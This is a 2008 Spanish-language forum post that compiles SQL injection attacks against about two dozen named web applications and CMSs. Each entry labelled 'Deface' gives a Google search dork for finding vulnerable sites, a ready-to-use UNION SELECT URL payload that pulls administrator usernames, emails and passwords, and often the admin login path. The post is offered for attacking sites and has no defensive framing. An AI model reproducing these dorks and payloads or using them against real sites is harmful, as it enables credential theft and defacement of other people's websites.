Título: Inyeccion SQL al completo ( todas las inyecciones ) Publicado por: R1D4R en 13 Diciembre 2008, 20:02 pm Aqui dejo esta recopilacion con las diferentes tipos de inyecciones que encontre ,todas estan probadas por mi y por supuesto aunque es algo dificil de encontrar algunas con dicha vulnerabilidad , las hay ;)
Deface Fundlink SQL Lo Que Buscaremos En Google: allinurl: \"fundlinkllc.com\" Inyeccions SQL: showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users Deface PHP-Newsletter(cat_id) SQL Lo Que Buscaremos En Google: llinurl: \"index.php?pgid\"cat_id Inyeccion SQL: index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,username,0x7c,password),0x3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1 Deface Powered by Com Endeavors SQL Buscar En Google: allinurl: \"index.php?go=detail\" Inyeccion SQL: index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2,2/**/from/**/admin/*where,limit,2-- Deface Powered by niccell SQL Buscar En Google: "powered by niccell" Inyeccions SQL: list.php?pagenum=S@BUN&categoryid=9999+union+select+111,222,concat(login,0x3a,password),444+from+admin_login/* Deface KwsPHP v1.3.456 SQL Buscar En Google: "index.php?mod=galerie"action=gal Inyeccion SQL: index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pass),4,5,6,7/**/from/**/users/* Deface Powered by Esy SQL Buscar En Google: \"Powered by Esy\" Inyeccion SQL: sections.php?op=viewarticle&artid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/* Inyeccions SQL 2: sections.php?op=printpage&artid=-9999999/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/* Deface showresult Buscar En Google: allinurl: "index.php?p=poll"showresult Inyeccion SQL: index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+kpro_user Deface powered by koobi-cms 4.3.0 Buscar En Google: Koobi CMS 4.3.0: "powered by koobi-cms 4.3.0" Inyeccion SQL: index.php?area=1&p=gallery&action=showimages&galid=[SQL] ESTE PARA EL ADMIN: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/* Deface Powered by BosClassifieds Classified Ads System Buscar En Google: "Powered by BosClassifieds Classified Ads System" Inyeccion SQL: site.c0m/bosclassifieds/index.php?cat=[SQL] Solo Para versión: BosClassifieds 3.0 Deface Powered by SmallBiz eShop Buscar En Google: Powered by SmallBiz eShop Inyeccion SQL: index.php?content_id=-20'%20union%20select%20convert(concat(database(),char(5,8)user(),char(5,version()),char)/* Deface pollBooth Buscar En Google: allinurl: "pollBooth.php?op=results"pollID Inyeccion SQL: pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users Deface RS MAXSOFT Buscar En Google: "RS MAXSOFT" Inyeccion SQL: modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin ADMiN LOGiN=admin.php?page=logfrm Deface gallerypic img Buscar En Google: allinurl: "index.php?p=gallerypic img_id" Inyeccion SQL: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi4_user Inyeccion SQL 2: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi_user Admin Login: login=admin/login.php Deface Powere By SSWD Buscar En Google: allinurl: "index.php?go=subcat" Inyeccion SQL: index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6/**/from/**/admin/* Deface Powered by OpenLD Buscar En Google: "Powered by OpenLD" Inyeccion SQL: index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null ,null,null,null,null/**/FROM/**/settings-- Deface Index php P Shop Buscar En Google: allinurl: "index php p shop"categ Inyeccion SQL: index.php?p=shop&show=showdetail&fid=ulus&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user Admin Login: login=admin/login.php Deface Powered by Site Sift Buscar En Google 1 : powered by Site Sift Buscar En Google 2 : allinurl: "index php go addpage" Buscar En Google 3 : allinurl: "index.php?go=detail id=" Inyecion SQL 1 : index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/* Inyecion SQL 2 : index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/* Admin Login: admin/login.php Deface Showlink Buscar En Google: allinurl: "index.php?showlink"links Inyeccion SQL: index.php?showlink=ulus&fid=ulus8&p=links&area=1&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user Admin Login: login=admin/login.php Deface Powered by eSyndiCat Buscar Google: © 2005-2006 Powered by eSyndiCat Directory Software Inyeccion SQL: news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/* Admin Login: from%20dir_admins/* Deface CartWeaver Buscar En Google: allinurl:Results.cfm?category= Inyecion SQL Para Sacar El Nombre Del Admin: Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20admin_username%20from%20tbl_adminuser s)) Inyecion SQL Para Sacar La Password: Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20char(97)%2badmin_password%20from%20tb l_adminusers)) Admin Login: /cw2/admin/ Deface Bwired Buscar En Google: "Powered by bwired" inurl:?newsID= Inyeccion SQL: index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser Deface Powered by Md-Pro Buscar En Google: "Powered by Md-Pro" Inyeccion SQL: index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/* DefaceBrowse Blogs by Category Buscar En Google: allintext:"Browse Blogs by Category" Inyeccion SQL: index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6/**/FROM/**/websiteadmin_admin_users/* Deface eMeeting Online Dating Software 5.2 Buscar En Google: allintext:"Home Member Search Chat Room Forum Help/Support privacy policy" Inyecion SQL 1 : b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/* Inyecion SQL 2 : b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/* Deface FlashGameScript 1.7 Buscar En Google: "Powered by FlashGameScript" Inyeccion SQL 1 : index.php?func=member&user='+union+select+0,0,0,0, 0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+ from+members+where+user_type=2/* Inyeccion SQL 2 : index.php?func=member&user='+union+select+0,0,0,0, 0,0,0,0,0,0,username,password,0,0,0,0,user_type+fr om+members+where+user_type=2/* |